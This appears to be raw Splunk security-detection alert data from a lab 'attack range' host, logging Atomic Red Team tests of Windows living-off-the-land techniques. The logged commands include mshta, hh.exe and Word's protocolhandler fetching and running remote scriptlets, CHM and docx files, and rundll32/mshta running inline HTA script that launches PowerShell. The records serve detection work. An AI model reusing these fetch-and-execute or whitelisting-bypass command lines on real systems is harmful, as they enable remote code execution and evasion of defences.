process="\"cmd.exe\" /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", process_id="6688", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"mshta.exe \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%%20\"\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%20Hello,%%20MSHTA!;Start-Sleep%%20-Seconds%%205\"\"\"))&lt;/script&gt;'\"\"", process_id="7768", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"mshta.exe \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%%20\"\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%20Hello,%%20MSHTA!;Start-Sleep%%20-Seconds%%205\"\"\"))&lt;/script&gt;'\"\"", process_id="7768", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:40", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:40", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")\"", process_id="3228", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:40", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:40", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")\"", process_id="3228", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm\"", process_id="6176", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm\"", process_id="6176", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"hh.exe C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm\"", process_id="3856", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"hh.exe C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm\"", process_id="3856", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"FOR /F \"tokens=2*\" %%a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%%b &amp; call \"%%microsoft_wordpath%%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\"", process_id="492", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"FOR /F \"tokens=2*\" %%a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%%b &amp; call \"%%microsoft_wordpath%%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\"", process_id="492", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741904, search_name="ESCU - Detect Rundll32 Inline HTA Execution - Rule", analyticstories="Living Off The Land", analyticstories="NOBELIUM Group", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"NOBELIUM Group\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="NOBELIUM Group", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:53", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:53", original_file_name="unknown", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\rundll32.exe\" about:\"\\..\\mshtml,RunHTMLApplication \"%3Chta:application%3E%3Cscript%20language=\"JScript\"%3Ea=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%20c85c4e44-885b-4248-ba61-b29fdda0ca4c;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();%3C/script%3E", process_name="rundll32.exe", risk_message="Suspicious rundll32.exe inline HTA execution on win-host-mhaag-attack-range-117", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic identifies \"rundll32.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", user="Administrator"
1657741904, search_name="ESCU - Detect Rundll32 Inline HTA Execution - Rule", analyticstories="Living Off The Land", analyticstories="NOBELIUM Group", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"NOBELIUM Group\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="NOBELIUM Group", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:53", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:53", original_file_name="RUNDLL32.EXE", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\rundll32.exe\" about:\"\\..\\mshtml,RunHTMLApplication \"%%3Chta:application%%3E%%3Cscript%%20language=\"JScript\"%%3Ea=new%%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%20c85c4e44-885b-4248-ba61-b29fdda0ca4c;%%20Start-Sleep%%20-Seconds%%202;%%20exit\",0,true);close();%%3C/script%%3E", process_name="rundll32.exe", risk_message="Suspicious rundll32.exe inline HTA execution on win-host-mhaag-attack-range-117", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic identifies \"rundll32.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", user="Administrator"
